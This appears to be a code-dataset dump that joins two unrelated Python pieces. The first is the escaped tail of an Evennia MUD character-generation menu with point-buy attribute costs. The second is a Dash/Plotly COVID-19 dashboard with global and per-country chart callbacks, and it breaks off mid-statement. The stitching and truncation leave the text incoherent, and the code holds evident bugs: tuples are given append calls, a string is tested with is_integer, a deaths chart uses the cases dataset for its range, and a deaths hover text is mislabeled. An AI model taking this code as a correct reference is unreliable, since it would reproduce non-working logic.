'node_attributes'\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n if not is_add:\n cost *= -1\n if cost > caller.ndb._menutree.points['attributes']:\n deficit = (caller.ndb._menutree.points['attributes'] - cost) * -1\n error(caller, 'Raising %s' % attribute.name + \n ' costs %s total points,' % cost + \n ' %s more points than you have available.' % deficit)\n return 'node_attributes'\n if is_add:\n caller.ndb._menutree.character['stats'][attribute.name] += value\n else:\n caller.ndb._menutree.character['stats'][attribute.name] -= value\n caller.ndb._menutree.points['attributes'] -= cost\n msg = ('Successfully set %s ' % attribute.name + 'to %s' % caller.ndb.\n _menutree.character['stats'][attribute.name])\n msg += ' for %s points.' % cost\n success(caller, msg)\n return 'node_attributes'\n\n\ndef node_finish(caller):\n text = ''\n options = ()\n return text, options\n\n\ndef success(caller, msg):\n caller.msg('|b<|cSystem|b>|n %s' % msg)\n\n\ndef error(caller, msg):\n caller.msg('|y<|rError|y>|n %s' % msg)\n", "step-5": "from world.enums import *\nfrom world.content.species import SPECIES\nfrom world.content.chargen import *\nfrom evennia.utils.evmenu import get_input\nfrom evennia.utils.utils import list_to_string\nimport re\n\ndef start(caller):\n if not caller:\n return\n caller.ndb._menutree.points = {\n \"attributes\": 20,\n \"skills\": 20\n }\n caller.ndb._menutree.character = {\n \"home_planet\": None,\n \"full_name\": None,\n \"origin\": None,\n \"stats\": {},\n \"age\": 16,\n \"is_psionic\": False,\n \"current_term\": 0,\n \"species\": \"human\"\n }\n caller.ndb._menutree.terms = []\n\n for attribute in AttributeEnum:\n caller.ndb._menutree.character[\"stats\"][attribute.name] = 20\n\n text = \"\"\"\n Welcome to Singularity's Character Generator!\n \n Have a paragraph about WTF is going on and some info about our game. Also here are some warnings\n that you *definitely* shouldn't make multiple characters. And also here's some commands to\n help get you more info! TBD!!!\n \n |yPlease do not make multiple characters to game chargen.|n\n \n When you're ready, go ahead and like.. type |ybegin|n to start CharGen.\n \"\"\"\n\n return text, ({\"key\": \"begin\", \"goto\": \"node_menu\"})\n\n\ndef node_menu(caller):\n name = caller.ndb._menutree.character[\"full_name\"]\n if not name:\n name = \"Not Set\"\n species = caller.ndb._menutree.character[\"species\"]\n origin = caller.ndb._menutree.character[\"origin\"]\n if not origin:\n origin = \"Not Set\"\n\n d_b = \"|gOk|n\" if _is_basics_done(caller)[0] else \"|rNo|n\"\n d_a = \"|gOk|n\" if _is_attributes_done(caller)[0] else \"|rNo|n\"\n d_s = \"|gOk|n\" if _is_skills_done(caller)[0] else \"|rNo|n\"\n d_l = \"|gOk|n\" if _is_life_done(caller)[0] else \"|rNo|n\"\n\n text = \"\"\"\n Below are the general details of your character. Use the below commands\n to navigate through chargen steps. Some steps may appear after others are completed.\n \n |wFull Name:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Completed:\n |wBasics:|n %s\n |wAttributes:|n %s\n |wStarting Skills:|n %s\n |wLife path:|n %s \n \"\"\" % (name, species, origin, d_b, d_a, d_s, d_l)\n\n options = (\n {\"key\": \"basics\", \"goto\": \"node_basics\"},\n {\"key\": \"attributes\", \"goto\": \"node_attributes\"},\n {\"key\": \"skills\", \"goto\": \"node_skills\"}\n )\n\n if _is_basics_done(caller)[0] and _is_attributes_done(caller)[0] and _is_skills_done(caller)[0]:\n options.append({\"key\": \"life path\", \"goto\": \"node_terms\"})\n if _is_life_done(caller)[0]:\n options.append({\"key\": \"finish\", \"goto\": \"node_finish\"})\n\n return text, options\n\n\ndef node_basics(caller):\n character = caller.ndb._menutree.character\n name = character[\"full_name\"]\n if not name:\n name = \"Not Set\"\n species = character[\"species\"]\n origin = character[\"origin\"]\n if not origin:\n origin = \"Not Set\"\n age = character[\"age\"]\n text = \"\"\"\n |wFull Name:|n %s\n |wAdolescent Age:|n %s\n |wSpecies:|n %s\n |wOrigin:|n %s\n \n Type |yhelp <command>|n to get info on available choices.\n \"\"\" % (name, age, species, origin)\n\n options = (\n {\"key\": \"return\", \"goto\": \"node_menu\"},\n {\"key\": \"full_name\", \"goto\": _node_basics_full_name},\n {\"key\": \"age\", \"goto\": _node_basics_age},\n {\"key\": \"species\", \"goto\": _node_basics_species},\n {\"key\": \"origin\", \"goto\": _node_basics_origin}\n )\n\n return text, options\n\n\ndef _node_basics_full_name(caller):\n def callback(caller, prompt, user_input):\n caller.msg(\"You set your character's full name to: %s.\" % user_input)\n caller.ndb._menutree.character[\"full_name\"] = user_input\n get_input(caller, \">> Enter your character's full name.\", callback)\n\n\ndef _node_basics_age(caller):\n def callback(caller, prompt, user_input):\n species = next(s for s in CHARGEN[\"species\"] if s[\"key\"] == caller.ndb._menutree.character[\"species\"])\n if not user_input.is_integer() \\\n or int(user_input) < species[\"min_start_age\"] \\\n or int(user_input) > species[\"max_start_age\"]:\n caller.msg(\"Age must be a valid number between %s and %s.\"\n % (species[\"min_start_age\"], species[\"max_start_age\"]))\n return\n caller.msg(\"You set your character's age to: %s.\" % user_input)\n caller.ndb._menutree.character[\"age\"] = int(user_input)\n get_input(caller, \">> Enter your character's age.\", callback)\n\n\ndef _node_basics_species(caller):\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n species = next((s for s in SPECIES if s[\"title\"].lower().startswith(user_input.lower())), None)\n if not species:\n caller.msg(\"'%s' is not a valid species. Valid species: |wHuman|n, and |wAndroid.|n\" % user_input)\n return\n species_chargen = next(s for s in CHARGEN[\"species\"] if s[\"key\"] == species[\"key\"])\n caller.msg(\"You set your character's species to: %s.\" % species[\"title\"])\n character[\"age\"] = species_chargen[\"min_age\"]\n character[\"origin\"] = None\n character[\"species\"] = species[\"key\"]\n get_input(caller, \">> Enter your character's species.\", callback)\n\n\ndef _node_basics_origin(caller):\n def callback(caller, prompt, user_input):\n character = caller.ndb._menutree.character\n origins = filter(lambda o: character[\"species\"] in o[\"species_restrictions\"], CHARGEN[\"origins\"])\n origin = next((o for o in origins if o[\"title\"].lower().startswith(user_input.lower())), None)\n if not origin:\n caller.msg(\"'%s' is not a valid origin choice. Valid choices: %s\"\n % (user_input, list_to_string(map(lambda o: o[\"title\"], origins))))\n return\n caller.msg(\"You set your character's origin to: %s.\" % user_input)\n character[\"origin\"] = origin[\"key\"]\n get_input(caller, \">> Enter your character's origin.\", callback)\n\n\ndef _is_attributes_done(caller):\n if caller.ndb._menutree.points[\"attributes\"] != 0:\n return False, \"All attribute points must be allocated.\"\n return True, \"\"\n\n\ndef _is_basics_done(caller):\n character = caller.ndb._menutree.character\n name = character[\"full_name\"]\n if not name or len(name) < 3:\n return False, \"Full name must have a value and be longer than 3 characters.\"\n origin = character[\"origin\"]\n if not origin:\n return False, \"Must select an origin.\"\n species_stats = next(s for s in CHARGEN[\"species\"] if s[\"key\"] == character[\"species\"])\n age = character[\"age\"]\n if age < species_stats[\"min_start_age\"]:\n return False, \"Age must be equal to or more than %s.\" % species_stats[\"min_start_age\"]\n if age > species_stats[\"max_start_age\"]:\n return False, \"Age must be equal to or less than %s.\" % species_stats[\"max_start_age\"]\n return True, \"\"\n\n\ndef _is_skills_done(caller):\n return False, \"\"\n\n\ndef _is_life_done(caller):\n return False, \"\"\n\n\ndef node_skills(caller):\n text = \"\"\"\n \"\"\"\n\n index = 0\n stats = caller.ndb._menutree.character[\"stats\"]\n for skill in SkillEnum:\n if index % 2 == 0:\n text += \"\\n\"\n\n text += (\"%s:\" % skill.name).ljust(28)\n value = stats.get(skill.name, 0)\n text += str(value).rjust(9)\n if index % 2 == 0:\n text += \" \"\n index += 1\n\n options = (\n {\"key\": \"return\", \"goto\": \"node_menu\"},\n {\"key\": \"set\", \"goto\": \"\"}\n )\n\n return text, options\n\n\ndef node_attributes(caller):\n text = \"\"\n for attribute in AttributeEnum:\n if attribute == AttributeEnum.Psi and not caller.ndb._menutree.character[\"is_psionic\"]:\n continue\n text += \"%s: \" % attribute.name\n text += \"%s\\r\\n\" % caller.ndb._menutree.character[\"stats\"][attribute.name]\n text += \"\\r\\n%s points remaining.\\r\\n\" % caller.ndb._menutree.points[\"attributes\"]\n text += \"\\r\\nType \\\"|yadd <number> to <attribute>|n\\\" to adjust an attribute positively.\"\n text += \"\\r\\nType \\\"|ysub <number> from <attribute>|n\\\" to adjust an attribute negatively.\"\n\n # options = {\"key\": \"_default\", \"goto\": _node_attributes}\n # if caller.ndb._menutree.points[\"attributes\"] == 0:\n options = ({\"key\": \"_default\", \"goto\": _node_attributes},\n {\"key\": \"return\", \"goto\": \"node_menu\"})\n return text, options\n\n\ndef _node_attributes(caller, raw_string):\n match = re.match(r\"add (\\d+) to (\\w+)\", raw_string)\n if match:\n return adjust_attribute(caller, match, True)\n match = re.match(r\"sub (\\d+) from (\\w+)\", raw_string)\n if match:\n return adjust_attribute(caller, match, False)\n\n if not match:\n return \"node_attributes\"\n\n\ndef node_terms(caller):\n text = \"\"\n term_count = 1\n for term in caller.ndb._menutree.terms:\n text += \"\\r\\n* Term %s:\" % term_count + \" %s\" % term.title\n term_count += 1\n\n age = caller.ndb._menutree.character[\"age\"] + (4 * caller.ndb._menutree.character[\"current_term\"])\n text += \"\\r\\nCurrent Character Age: %s\" % age\n text += \"\\r\\n\\r\\nType \\\"|ychoose <term>|n\\\" to begin a term.\"\n\n options = ({\"key\": \"_default\", \"goto\": _node_terms},\n {\"key\": \"list choices\", \"goto\": _list_term_choices},\n {\"key\": \"finish\", \"goto\": \"node_finish\"})\n return text, options\n\n\ndef _node_terms(caller, raw_string):\n match = re.match(r\"choose (\\w+)\", raw_string)\n if not match:\n error(caller, \"I didn't understand that.\")\n return \"node_terms\"\n\n term_token = match.group(1).lower()\n term = next((x for x in TERMS if x[\"title\"].lower().startswith(term_token)), None)\n if not term:\n error(caller, \"%s is not a valid term. Type \\\"|ylist choices|n\\\" to get a list of all available careers.\")\n return \"node_terms\"\n\n caller.ndb._menutree.terms.append({\n \"term\": term[\"title\"]\n })\n return \"node_term\"\n\n\ndef _list_term_choices(caller):\n text = \"\"\n for term in TERMS:\n text += \"\\r\\n* %s\" % term[\"title\"]\n for assignment in term[\"assignments\"]:\n text += \"\\r\\n\\t- %s: \" % assignment[\"title\"]\n text += \"sample description text\"\n\n caller.msg(text)\n return \"node_terms\"\n\n\ndef node_term(caller):\n term_title = caller.ndb._menutree.terms[len(caller.ndb._menutree.terms) - 1][\"term\"]\n # term = next((x for x in TERMS if x[\"title\"] == term_title), None)\n text = \"Career: %s\" % term_title\n text += \"\\r\\nAssignment: Not Set\"\n text += \"\\r\\nPersonal Advancement: Not Set\"\n text += \"\\r\\nYears: %s\" % caller.ndb._menutree.character[\"age\"]\n text += \"-%s\" % (caller.ndb._menutree.character[\"age\"] + 4)\n text += \"\\r\\n\\r\\nLife Event: |y1 Available|n\"\n\n text += \"\\r\\n\\r\\nType \\\"|yset Assignment to <assignment>|n\\\" to choose an assignment.\"\n text += \"\\r\\nType \\\"|yset Advancement to <option>|n\\\" to choose a personal advancement.\"\n text += \"\\r\\n\\r\\nRolling for a life event is optional and may yield positive or negative results. \"\n text += \"Once you've chosen to roll a life event, the result cannot be rerolled or changed except through mulligan.\"\n\n options = ({\"key\": \"show assignments\", \"goto\": _list_term_assignments},\n {\"key\": \"show advancements\", \"goto\": _list_term_advancements},\n {\"key\": \"roll life event\", \"goto\": _do_life_event})\n return text, options\n\n\ndef _list_term_advancements(caller):\n return \"node_term\"\n\n\ndef _list_term_assignments(caller):\n return \"node_term\"\n\n\ndef _do_life_event(caller):\n return \"node_term\"\n\n\ndef adjust_attribute(caller, match, is_add):\n attribute_token = match.group(2).lower()\n attribute = next((x for x in AttributeEnum if x.name.lower().startswith(attribute_token)), None)\n if not attribute:\n error(caller, \"%s is not a valid attribute.\" % match.group(2))\n return \"node_attributes\"\n value = int(match.group(1))\n if not value or value < 0:\n error(caller, \"Value to adjust must be a positive number.\")\n return \"node_attributes\"\n\n attribute_value = caller.ndb._menutree.character[\"stats\"][attribute.name]\n if not is_add and attribute_value - value < 10:\n error(caller, attribute.name + \" cannot be reduced below 10.\")\n return \"node_attributes\"\n\n # calculate cost..\n i_value = value\n cost = 0\n while i_value > 0:\n if is_add:\n new_value = i_value + attribute_value\n else:\n new_value = attribute_value - i_value\n\n if new_value <= 12:\n cost += 4\n elif new_value <= 16:\n cost += 2\n elif new_value <= 23:\n cost += 1\n elif new_value <= 26:\n cost += 2\n elif new_value <= 30:\n cost += 4\n i_value -= 1\n\n if not is_add:\n cost *= -1\n\n if cost > caller.ndb._menutree.points[\"attributes\"]:\n deficit = (caller.ndb._menutree.points[\"attributes\"] - cost) * -1\n error(caller, \"Raising %s\" % attribute.name + \" costs %s total points,\" % cost + \" %s more points than you have available.\" % deficit)\n return \"node_attributes\"\n\n # Succeeded the gauntlet. Change their stat.\n if is_add:\n caller.ndb._menutree.character[\"stats\"][attribute.name] += value\n else:\n caller.ndb._menutree.character[\"stats\"][attribute.name] -= value\n caller.ndb._menutree.points[\"attributes\"] -= cost\n\n msg = \"Successfully set %s \" % attribute.name + \"to %s\" % caller.ndb._menutree.character[\"stats\"][attribute.name]\n msg += \" for %s points.\" % cost\n success(caller, msg)\n return \"node_attributes\"\n\n\ndef node_finish(caller):\n text = \"\"\n options = ()\n\n return text, options\n\n\ndef success(caller, msg):\n caller.msg(\"|b<|cSystem|b>|n %s\" % msg)\n\n\ndef error(caller, msg):\n caller.msg(\"|y<|rError|y>|n %s\" % msg)\n", "step-ids": [ 14, 15, 19, 22, 27 ] }
[ 14, 15, 19, 22, 27 ]
<|reserved_special_token_0|> @app.callback(Output(component_id='global-box-1', component_property= 'figure'), [Input(component_id='global-dropdown', component_property= 'value')]) def global_update(select_global): if select_global == 'Global Cases Trend' or select_global is None: fig1000 = [] anno = [] for group, dataframe in cases_1000_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 1000 Cases']) trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di ['Confirmed'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig1000.append(trace) anno.append(a) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Cases Double Every 3 Days'], hovertemplate= '<b>Cases Double Every 3 Days</b>', showlegend=True)) fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 * i)) for i in list(np.arange(cases_1000_start[ 'Days Since 1000 Cases'].max()))], name= 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Cases Double Every 7 Days'], hovertemplate= '<b>Cases Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10 (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Confirmed Cases', xaxis={'title': 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[ 'Days Since 1000 Cases'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig1000, 'layout': layout_global} return fig_global elif select_global == 'Global Deaths Trend': fig100 = [] anno = [] for group, dataframe in deaths_100_start.groupby(by='Country_Region'): di = dataframe.sort_values(by=['Days Since 100 Deaths']) trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di ['Deaths'].tolist(), mode='lines', line=dict(color= colors_dict_global[list(di.loc[:, 'Continent'])[0]], width= 1), opacity=0.6, text=di.Country_Region.tolist(), legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate= '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' + 'Days Since First 1000 Cases: %{x}<br>', showlegend=False) a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y', 'showarrow': False, 'text': list(di.loc[:, 'Country_Region' ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align': 'center', 'font': {'size': 8, 'color': 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6} fig100.append(trace) anno.append(a) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dash'), text=[ '# of Deaths Double Every 3 Days'], hovertemplate= '<b>Deaths Double Every 3 Days</b>', showlegend=True)) fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 * i)) for i in list(np.arange(deaths_100_start[ 'Days Since 100 Deaths'].max()))], name= 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line= dict(color='grey', width=3, dash='dot'), text=[ '# of Deaths Double Every 7 Days'], hovertemplate= '<b>Deaths Double Every 7 Days</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Deaths', 'range': [np.log10(100), np.log10(cases_1000_start['Deaths']. max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title='Overall Deaths', xaxis={'title': 'Days Since First 100 deaths', 'range': [0, deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'showline': True, 'mirror': False}, height=750, hovermode= 'closest', annotations=anno) fig_global = {'data': fig100, 'layout': layout_global} return fig_global elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)': figmort = [] anno = [] m = mort.sort_values(by=['Confirmed'], ascending=False).head(20) m = m.sort_values(by=['Mortality_Percent'], ascending=True ).reset_index() for i in range(len(m)): m1 = m.loc[i, 'Country_Region'] m2 = m.loc[i, 'Mortality_Percent'] trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2], y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)], orientation='h', textposition='auto', marker=dict(color= '#FFB000', opacity=0.6, line=dict(color= 'rgba(255,176,0, 1)', width=1)), hovertemplate= '<b>%{y}</b><br>' + '<br>Observed Case Mortaility Pct: %{text}&#37;<br>', showlegend=False) figmort.append(trace) layout_global = go.Layout(yaxis={'title': 'Country / Region', 'fixedrange': True, 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Observed Case - Mortality Ratio', xaxis={'title': '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [ 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=750, hovermode='closest') fig_global = {'data': figmort, 'layout': layout_global} return fig_global elif select_global == 'Recoveries vs. Deaths By Country': figscat = [] rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100) ].reset_index() for i in range(len(rc)): scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i, 'Recovered']], mode='markers+text', text=[rc.loc[i, 'Country_Region']], marker_color=colors_dict_global[rc.loc[ i, 'Continent']], showlegend=False, marker=dict(size=12, line_width=1, opacity=0.75), hovertemplate= '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' + 'Deaths: %{x}<br>', textposition='bottom center', textfont= dict(size=10, color='rgba(0, 0, 0, 0.6)')) figscat.append(scat) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(), 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25, line=dict(color='grey', width=1), text=[ '# of Deaths = # of Recoveries'], hovertemplate= '<b># of Deaths = # of Recoveries</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Recoveries for Every Death', opacity=0.25, line=dict(color='green', width=3, dash='dash'), text=['2 Recoveries for Every Death'], hovertemplate= '<b>2 Recoveries for Every Death</b>', showlegend=True)) figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max( ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths']. max(), 3))], mode='lines', name='2 Deaths for Every Recovery', opacity=0.25, line=dict(color='firebrick', width=3, dash='dash' ), text=['2 Deaths for Every Recovery'], hovertemplate= '<b>2 Deaths for Every Recovery</b>', showlegend=True)) layout_global = go.Layout(yaxis={'title': 'Number of Recoveries', 'fixedrange': True, 'automargin': True, 'range': [np.log10(100), np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, title= 'Recoveries vs. Deaths, By Country', xaxis={'title': 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100), np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth': 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': False}, height=750, hovermode='closest' ) fig_global = {'data': figscat, 'layout': layout_global} return fig_global @app.callback([Output(component_id='main-dropdown-2', component_property= 'options'), Output(component_id='btext1', component_property='children' ), Output(component_id='subplot1', component_property='figure'), Output (component_id='btext2', component_property='children'), Output( component_id='subplot2', component_property='figure'), Output( component_id='btext3', component_property='children'), Output( component_id='subplot3', component_property='figure')], [Input( component_id='main-dropdown', component_property='value')]) def update_country(selected_country): if selected_country is None: selected_country = 'Canada' options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 'Recovered_Diff'], {'data': trace_3, 'layout': layout_t3} else: options = ['Confirmed', 'Recovered', 'Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#648FFF', width=3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Confirmed Cases: {0} (Last 45 Days)'.format( selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df ['Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width=3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[ 'Country_Region'] == selected_country, 'Date'].tail(45), y= final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6 ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[ final_df['Country_Region'] == selected_country, 'Date'].tail(45 ), y=final_df.loc[final_df['Country_Region'] == selected_country, 'Recovered_Diff'].tail(45).rolling(window=5). mean(), mode='lines', line=dict(color='#009E73', width=3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title= 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height= 300, legend=dict(x=0.2, y=-0.15, orientation='h')) return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max ()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1 }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], { 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[ 'Date'] == final_df['Date'].max()) & (final_df['Country_Region' ] == selected_country), 